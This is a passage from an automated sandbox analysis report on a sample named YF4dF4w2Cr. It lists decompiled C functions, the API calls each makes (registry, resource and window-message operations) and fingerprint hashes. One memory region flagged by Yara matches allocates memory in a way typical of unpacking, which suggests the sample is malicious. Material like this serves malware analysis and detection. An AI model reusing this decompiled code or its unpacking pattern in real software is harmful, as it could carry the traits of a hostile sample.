                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Valuelstrlen$CloseH_prolog3
                  • String ID:
                  • API String ID: 3141881944-0
                  • Opcode ID: ecfb811147b2c65053a74ac82368c8630f480c90e5ef6ef53a7cd7d30d4d7f0c
                  • Instruction ID: ccfb3bf29ba8f107e27247e9e6faae6128845c626efc22bed24505a1ddd35dde
                  • Opcode Fuzzy Hash: ecfb811147b2c65053a74ac82368c8630f480c90e5ef6ef53a7cd7d30d4d7f0c
                  • Instruction Fuzzy Hash: BE018F36604228FFEF111FA1EC04FEA3B69FB04754F508465FE19D9060D77589619BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E00417E26(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t9;
                  				void* _t14;
                  				void* _t18;
                  				void* _t19;
                  				void* _t20;
                  				void* _t22;
                  				struct HINSTANCE__* _t23;
                  
                  				_t18 = __edx;
                  				_push(__ecx);
                  				_push(_t22);
                  				_push(_t19);
                  				_v8 = __ecx;
                  				_t14 = 0;
                  				_t23 =  *(E0041F363(0, _t19, _t22, __eflags) + 0xc);
                  				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
                  				_t27 = _t20;
                  				if(_t20 != 0) {
                  					_t14 = LockResource(_t20);
                  				}
                  				_t9 = E00417A77(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23); // executed
                  				FreeResource(_t20);
                  				return _t9;
                  			}
















                  APIs
                  • FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                  • LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                  • LockResource.KERNEL32(00000000), ref: 00417E57
                  • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 8e08deefc1d4eeb41c3533c65acc15067e02b1b6d3acd629b27dc98bb15f0e42
                  • Instruction ID: 1e18d01870298c609716ab9c137838f91a6cabb118689048c7d05f5a7d7d13e7
                  • Opcode Fuzzy Hash: 8e08deefc1d4eeb41c3533c65acc15067e02b1b6d3acd629b27dc98bb15f0e42
                  • Instruction Fuzzy Hash: D1F0543B500214BBC7025FE79C48D9FBBBDEF86661B01406AFA0593251DA74DD0187A4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E0041EB0A(intOrPtr __ebx, void* __ecx, intOrPtr __edx) {
                  				signed int _v8;
                  				short _v10;
                  				short _v12;
                  				short _v532;
                  				struct HINSTANCE__* _v536;
                  				intOrPtr _v544;
                  				WCHAR* _v556;
                  				intOrPtr _v560;
                  				char _v564;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t25;
                  				intOrPtr _t36;
                  				intOrPtr _t40;
                  				struct HINSTANCE__* _t42;
                  				intOrPtr _t43;
                  				void* _t45;
                  				intOrPtr _t46;
                  				signed int _t50;
                  
                  				_t40 = __edx;
                  				_t36 = __ebx;
                  				_t48 = _t50;
                  				_t25 =  *0x463404; // 0x38a11573
                  				_v8 = _t25 ^ _t50;
                  				_t45 = __ecx;
                  				E0041EA0E(__ecx);
                  				_t42 =  *(__ecx + 8);
                  				_v10 = 0;
                  				_v12 = 0;
                  				if(GetModuleFileNameW(_t42,  &_v532, 0x105) != 0) {
                  					if(_v12 == 0) {
                  						_v556 =  &_v532;
                  						_push( &_v564);
                  						_v564 = 0x20;
                  						_v560 = 0x88;
                  						_v544 = 2;
                  						_v536 = _t42;
                  						_t30 = E0041EA7C(); // executed
                  						 *(_t45 + 0x80) = _t30;
                  						if(_t30 == 0xffffffff) {
                  							_push( &_v564);
                  							_v544 = 3;
                  							_t30 = E0041EA7C(); // executed
                  							 *(_t45 + 0x80) = _t30;
                  						}
                  						if( *(_t45 + 0x80) == 0xffffffff) {
                  							_push( &_v564);
                  							_v544 = 1;
                  							_t30 = E0041EA7C(); // executed
                  							 *(_t45 + 0x80) = _t30;
                  							if(_t30 == 0xffffffff) {
                  								 *(_t45 + 0x80) =  *(_t45 + 0x80) & 0x00000000;
                  							}
                  						}
                  					} else {
                  						SetLastError(0x6f);
                  					}
                  				}
                  				_pop(_t43);
                  				_pop(_t46);
                  				return E00430650(_t30, _t36, _v8 ^ _t48, _t40, _t43, _t46);
                  			}























                  APIs
                    • Part of subcall function 0041EA0E: GetModuleHandleA.KERNEL32(KERNEL32,0041EB28), ref: 0041EA1C
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041EA3D
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041EA4F
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041EA61
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041EA73
                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EB42
                  • SetLastError.KERNEL32(0000006F), ref: 0041EB59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$Module$ErrorFileHandleLastName
                  • String ID:
                  • API String ID: 2524245154-3916222277
                  • Opcode ID: aeeff5c80dfc3c80a29db3524e515376337288fbe9707934b8743fd1988e9f38
                  • Instruction ID: 2d8284ff9693ed2a28cfc80b954e748d0848247ed859874abad0443c4c525062
                  • Opcode Fuzzy Hash: aeeff5c80dfc3c80a29db3524e515376337288fbe9707934b8743fd1988e9f38
                  • Instruction Fuzzy Hash: 252180749002289EDB20DF76C8487EEB7B4BF18324F10469ED469D3280DB789A85DF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E00420AEC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t17;
                  				intOrPtr _t19;
                  				intOrPtr _t21;
                  				intOrPtr _t24;
                  				intOrPtr _t25;
                  				intOrPtr* _t30;
                  				void* _t31;
                  				intOrPtr _t33;
                  
                  				_t27 = __edi;
                  				_t23 = __ecx;
                  				_t22 = __ebx;
                  				_push(4);
                  				E00431A9B(E0044BF03, __ebx, __edi, __esi);
                  				_t30 = __ecx;
                  				_t33 =  *((intOrPtr*)(_t31 + 8));
                  				_t34 = _t33 == 0;
                  				if(_t33 == 0) {
                  					L1:
                  					E00406436(_t22, _t23, _t27, _t30, _t34);
                  				}
                  				if( *_t30 == 0) {
                  					_t23 =  *0x466564; // 0x466568
                  					if(_t23 != 0) {
                  						L5:
                  						_t19 = E004206EA(_t23); // executed
                  						 *_t30 = _t19;
                  						if(_t19 == 0) {
                  							goto L1;
                  						}
                  					} else {
                  						 *((intOrPtr*)(_t31 - 0x10)) = 0x466568;
                  						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                  						_t21 = E00420802(0x466568);
                  						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
                  						_t23 = _t21;
                  						 *0x466564 = _t21;
                  						if(_t21 == 0) {
                  							goto L1;
                  						} else {
                  							goto L5;
                  						}
                  					}
                  				}
                  				_t24 =  *0x466564; // 0x466568
                  				_t28 = E0042055C(_t24,  *_t30);
                  				_t39 = _t28;
                  				if(_t28 == 0) {
                  					_t17 =  *((intOrPtr*)(_t31 + 8))();
                  					_t25 =  *0x466564; // 0x466568
                  					E004208A9(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
                  				}
                  				return E00431B73(_t28);
                  			}












                  APIs
                  • __EH_prolog3.LIBCMT ref: 00420AF3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Exception@8Throw
                  • String ID: heF$heF
                  • API String ID: 2489616738-1142830922
                  • Opcode ID: 1346ea712d4e4320666148ee57bc0ebccbde87501e25841d6042c4860ada4fcd
                  • Instruction ID: ab974ef05ecb18432cb7f708e95ae9439a66807c8b60da0ae834fd07ff38b2a5
                  • Opcode Fuzzy Hash: 1346ea712d4e4320666148ee57bc0ebccbde87501e25841d6042c4860ada4fcd
                  • Instruction Fuzzy Hash: 560152307002229BDB24EF75A86262A7AE29B40398F51403EE442C73A2EB78D841C75D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E004200A3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t21;
                  				void* _t25;
                  				void* _t28;
                  				void* _t42;
                  				void* _t45;
                  
                  				_t45 = __eflags;
                  				_t38 = __edx;
                  				_push(0);
                  				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
                  				_push( *(_t42 + 0xc));
                  				E00406039(__ebx, _t42 + 0xc, __edx, __edi, __esi, _t45);
                  				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                  				if( *(_t42 + 8) == 0x80000000) {
                  					_t25 = E0041EC3D();
                  					_t47 = _t25 - 1;
                  					if(_t25 == 1) {
                  						_push(_t42 + 0xc);
                  						_push("Software\\Classes\\");
                  						_push(_t42 + 8);
                  						_t28 = E004168AB(__ebx, __edi, __esi, _t47);
                  						 *(_t42 - 4) = 1;
                  						E004056C2(__ebx, _t42 + 0xc, _t28);
                  						E004010B0( *(_t42 + 8) + 0xfffffff0, _t38);
                  						 *(_t42 + 8) = 0x80000001;
                  					}
                  				}
                  				_t21 = RegSetValueA( *(_t42 + 8),  *(_t42 + 0xc),  *(_t42 + 0x10),  *(_t42 + 0x14),  *(_t42 + 0x18)); // executed
                  				E004010B0( &(( *(_t42 + 0xc))[0xfffffffffffffff0]), _t38);
                  				return E00431B73(_t21);
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 004200AA
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegSetValueA.ADVAPI32(80000000,?,00000000,?,?), ref: 00420114
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Value
                  • String ID: Software\Classes\
                  • API String ID: 2677715340-1121929649
                  • Opcode ID: ab11ff7b6dd85ca76f8ef7d4a2dcb46c4aa119be024d553879f94372adda49c0
                  • Instruction ID: 36d8d2347135d1014e61bc86d482cac2e80b6f69d22420b9f2c8f0bbc59bcd91
                  • Opcode Fuzzy Hash: ab11ff7b6dd85ca76f8ef7d4a2dcb46c4aa119be024d553879f94372adda49c0
                  • Instruction Fuzzy Hash: 7301713550010CABCF01EF61C851BDE3B65EF04368F10C11AFD295A2A2DB7ADAA4CBD9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E00420018(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t20;
                  				void* _t24;
                  				void* _t27;
                  				void* _t41;
                  				void* _t44;
                  
                  				_t44 = __eflags;
                  				_t37 = __edx;
                  				_push(0);
                  				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
                  				_push( *(_t41 + 0xc));
                  				E00406039(__ebx, _t41 + 0xc, __edx, __edi, __esi, _t44);
                  				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                  				if( *(_t41 + 8) == 0x80000000) {
                  					_t24 = E0041EC3D();
                  					_t46 = _t24 - 1;
                  					if(_t24 == 1) {
                  						_push(_t41 + 0xc);
                  						_push("Software\\Classes\\");
                  						_push(_t41 + 8);
                  						_t27 = E004168AB(__ebx, __edi, __esi, _t46);
                  						 *(_t41 - 4) = 1;
                  						E004056C2(__ebx, _t41 + 0xc, _t27);
                  						E004010B0( *(_t41 + 8) + 0xfffffff0, _t37);
                  						 *(_t41 + 8) = 0x80000001;
                  					}
                  				}
                  				_t20 = RegQueryValueA( *(_t41 + 8),  *(_t41 + 0xc),  *(_t41 + 0x10),  *(_t41 + 0x14)); // executed
                  				E004010B0( &(( *(_t41 + 0xc))[0xfffffffffffffff0]), _t37);
                  				return E00431B73(_t20);
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042001F
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegQueryValueA.ADVAPI32(?,?,?,?), ref: 00420086
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$QueryValue
                  • String ID: Software\Classes\
                  • API String ID: 3057600494-1121929649
                  • Opcode ID: 606f051547e3e45d2aaf1ea27d24ff6cb1e51406f715982b84829b8d1ec6d3ef
                  • Instruction ID: 6bbe67646f65ca86f3e8ed88bc76af1affd6d011764a7e200061fff5045a4722
                  • Opcode Fuzzy Hash: 606f051547e3e45d2aaf1ea27d24ff6cb1e51406f715982b84829b8d1ec6d3ef
                  • Instruction Fuzzy Hash: 15018F31500108ABCF11EF61CC51BDE3B24EF00368F10C51AFD295A2A2DB7ACA94CB9A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E0041FF90(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t19;
                  				void* _t23;
                  				void* _t26;
                  				void* _t40;
                  				void* _t43;
                  
                  				_t43 = __eflags;
                  				_t36 = __edx;
                  				_push(0);
                  				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
                  				_push( *(_t40 + 0xc));
                  				E00406039(__ebx, _t40 + 0xc, __edx, __edi, __esi, _t43);
                  				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                  				if( *(_t40 + 8) == 0x80000000) {
                  					_t23 = E0041EC3D();
                  					_t45 = _t23 - 1;
                  					if(_t23 == 1) {
                  						_push(_t40 + 0xc);
                  						_push("Software\\Classes\\");
                  						_push(_t40 + 8);
                  						_t26 = E004168AB(__ebx, __edi, __esi, _t45);
                  						 *(_t40 - 4) = 1;
                  						E004056C2(__ebx, _t40 + 0xc, _t26);
                  						E004010B0( *(_t40 + 8) + 0xfffffff0, _t36);
                  						 *(_t40 + 8) = 0x80000001;
                  					}
                  				}
                  				_t19 = RegCreateKeyA( *(_t40 + 8),  *(_t40 + 0xc),  *(_t40 + 0x10)); // executed
                  				E004010B0( &(( *(_t40 + 0xc))[0xfffffffffffffff0]), _t36);
                  				return E00431B73(_t19);
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041FF97
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegCreateKeyA.ADVAPI32(80000000,?,00000000), ref: 0041FFFB
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Create
                  • String ID: Software\Classes\
                  • API String ID: 1257125548-1121929649
                  • Opcode ID: f64bdd3912328e0541e1767b5fd0a8945742743fea4c45dcb99d5a30ac551f09
                  • Instruction ID: ad4cc70f86dcb154f4fc015380cce98aa4d1ccfaf3cac0b944be5d41c75bc983
                  • Opcode Fuzzy Hash: f64bdd3912328e0541e1767b5fd0a8945742743fea4c45dcb99d5a30ac551f09
                  • Instruction Fuzzy Hash: F0016236400108ABCF11EF65C851BDE3B24EF10368F10C52FFD295A2A2DB79DA95CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,022F0005), ref: 022F00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,022F0005), ref: 022F0113
                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: 895abc098ca0bcaf11b762a7dbd5cd21e7295f8514ba7fbe2c37cc5ccf11011f
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: DDE1AF71A183068FDB64CF99C84072AF3E1BF84318F08453DEA959B64AE774EA45CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00404F72(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16, struct HWND__* _a20, char _a24) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				void* _v40;
                  				signed int _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				signed int _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				signed int _v80;
                  				intOrPtr _v84;
                  				char _v88;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr* _t70;
                  				long _t91;
                  				signed int _t92;
                  				void* _t104;
                  				void* _t105;
                  				intOrPtr _t111;
                  				intOrPtr _t118;
                  				intOrPtr* _t119;
                  				intOrPtr* _t120;
                  
                  				_t109 = __ecx;
                  				_t120 = _a20;
                  				_t119 = __ecx;
                  				if(_t120 != 0) {
                  					L4:
                  					 *((intOrPtr*)( *_t120 + 0x150))(1);
                  					_v44 = _v44 & 0x00000000;
                  					_v48 = _a4;
                  					_v52 = _a8;
                  					_v56 = _a12;
                  					_t70 = _a16;
                  					_t111 =  *_t70;
                  					_t118 =  *((intOrPtr*)(_t70 + 4));
                  					_v60 = _t111;
                  					_v64 = _t118;
                  					_v68 =  *((intOrPtr*)(_t70 + 8)) - _t111;
                  					_v72 =  *((intOrPtr*)(_t70 + 0xc)) - _t118;
                  					_v80 = _v80 & 0x00000000;
                  					_v76 =  *((intOrPtr*)(_t120 + 0x20));
                  					_v84 =  *((intOrPtr*)(E0041F363( *((intOrPtr*)(_t70 + 8)) - _t111, _t119, _t120, _t123) + 8));
                  					_v88 = _a24;
                  					_push( &_v88);
                  					if( *((intOrPtr*)( *_t119 + 0x64))() != 0) {
                  						_v40 = _v48;
                  						_v36 = _v52;
                  						_v32 = _v84;
                  						_v28 = _v60;
                  						_v24 = _v64;
                  						_v20 = _v68;
                  						_v16 = _v72;
                  						_v12 = _v56 & 0xeeffffff;
                  						_v8 = _v88;
                  						E00410F0D(__eflags, _t119);
                  						_t91 = SendMessageA( *(_t120 + 0xe8), 0x220, 0,  &_v40); // executed
                  						_a20 = _t91;
                  						_t92 = E0040EEF5(__eflags);
                  						__eflags = _t92;
                  						if(_t92 == 0) {
                  							 *((intOrPtr*)( *_t119 + 0x11c))();
                  						}
                  						__eflags = _a20;
                  						if(_a20 == 0) {
                  							L6:
                  							return 0;
                  						} else {
                  							__eflags = _v56 & 0x10000000;
                  							if((_v56 & 0x10000000) != 0) {
                  								BringWindowToTop(_a20);
                  								__eflags = _v56 & 0x20000000;
                  								if((_v56 & 0x20000000) == 0) {
                  									__eflags = _v56 & 0x01000000;
                  									if((_v56 & 0x01000000) == 0) {
                  										_push(1);
                  									} else {
                  										_push(3);
                  									}
                  								} else {
                  									_push(2);
                  								}
                  								E00412C34(_t119);
                  								E004049F6(_t120, _t119);
                  								SendMessageA( *(_t120 + 0xe8), 0x234, 0, 0);
                  							}
                  							__eflags = 1;
                  							return 1;
                  						}
                  					}
                  					 *((intOrPtr*)( *_t119 + 0x11c))();
                  					goto L6;
                  				}
                  				_t104 = E00415AD9();
                  				_t122 = _t104;
                  				if(_t104 != 0) {
                  					L3:
                  					_t120 =  *((intOrPtr*)(_t104 + 0x20));
                  					_t123 = _t120;
                  					if(_t120 == 0) {
                  						goto L2;
                  					}
                  					goto L4;
                  				}
                  				L2:
                  				_t104 = E00406436(_t105, _t109, _t119, _t120, _t122);
                  				goto L3;
                  			}

                  APIs
                  • SendMessageA.USER32(?,00000220,00000000,?), ref: 0040506E
                  • BringWindowToTop.USER32 ref: 00405098
                  • SendMessageA.USER32(?,00000234,00000000,00000000), ref: 004050D8
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$BringException@8H_prolog3ThrowWindow
                  • String ID:
                  • API String ID: 306136782-0
                  • Opcode ID: 452149fc19147f145c348fe4a77579aa4786186d4c22d5f577727ab54a72b289
                  • Instruction ID: 6dae8c16407d9ac781d226e3f0a0722bfa2389bcaa109963fa7a45136cf591de
                  • Opcode Fuzzy Hash: 452149fc19147f145c348fe4a77579aa4786186d4c22d5f577727ab54a72b289
                  • Instruction Fuzzy Hash: 4251E474A012099FDB10DFA9C985BAEBBF5FF48304F10402AF909EB390D778A9418F95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00414B9C(intOrPtr __ecx) {
                  				void* _v8;
                  				char _v12;
                  				int _v16;
                  				intOrPtr _v20;
                  				int _v24;
                  				long _t29;
                  				char* _t30;
                  				intOrPtr _t32;
                  				char** _t34;
                  				signed int _t39;
                  				char** _t43;
                  				char* _t45;
                  
                  				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
                  				_v20 = __ecx;
                  				_v8 = 0;
                  				_v12 = 0;
                  				_v24 = 4;
                  				_v16 = 0;
                  				_t34 = 0x462ba0;
                  				_t45 =  *0x462ba0; // 0x451b18
                  				if(_t45 == 0) {
                  					L14:
                  					return 1;
                  				}
                  				do {
                  					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
                  					if(_t29 != 0) {
                  						goto L12;
                  					}
                  					_t8 =  &(_t34[1]); // 0x462bc0
                  					_t43 =  *_t8;
                  					while(1) {
                  						_t30 =  *_t43;
                  						if(_t30 == 0) {
                  							break;
                  						}
                  						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
                  							_t14 =  &(_t43[1]); // 0x1
                  							_t39 =  *_t14;
                  							_t32 = _v20;
                  							if(_v12 == 0) {
                  								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
                  							} else {
                  								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
                  							}
                  						}
                  						_v12 = 0;
                  						_v24 = 4;
                  						_v16 = 0;
                  						_t43 =  &(_t43[2]);
                  					}
                  					RegCloseKey(_v8);
                  					_v8 = 0;
                  					L12:
                  					_t34 =  &(_t34[2]);
                  				} while ( *_t34 != 0);
                  				goto L14;
                  			}

                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000001,00462BA0,00000000,00000001,?), ref: 00414BE1
                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00414C01
                  • RegCloseKey.ADVAPI32(?), ref: 00414C45
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID:
                  • API String ID: 3677997916-0
                  • Opcode ID: dda4bb9c493b882952acdf434a85abb3409c9764fd7b0edcfaa04450280da8d2
                  • Instruction ID: 0d605141b2b3a1f8deb0ee767be3a254aedc986605f7b564ed76e2b6a05936f2
                  • Opcode Fuzzy Hash: dda4bb9c493b882952acdf434a85abb3409c9764fd7b0edcfaa04450280da8d2
                  • Instruction Fuzzy Hash: 8A2149B1D01208EFDB14CF86D944AEEFBF8FF91701F2144AAE415A6210E3B59A40CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E00426574(void* __ecx, int _a4, CHAR* _a8, int _a12) {
                  				char _v8;
                  				int _v12;
                  				int _t14;
                  				long _t19;
                  				void* _t27;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                  					_t14 = GetPrivateProfileIntA(_a4, _a8, _a12,  *(__ecx + 0x68)); // executed
                  				} else {
                  					_t27 = E0042652C(__ecx, _a4);
                  					if(_t27 != 0) {
                  						_a4 = 4;
                  						_t19 = RegQueryValueExA(_t27, _a8, 0,  &_v12,  &_v8,  &_a4);
                  						RegCloseKey(_t27);
                  						if(_t19 != 0) {
                  							goto L2;
                  						} else {
                  							_t14 = _v8;
                  						}
                  					} else {
                  						L2:
                  						_t14 = _a12;
                  					}
                  				}
                  				return _t14;
                  			}

                  APIs
                  • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004265AF
                  • RegCloseKey.ADVAPI32(00000000), ref: 004265B8
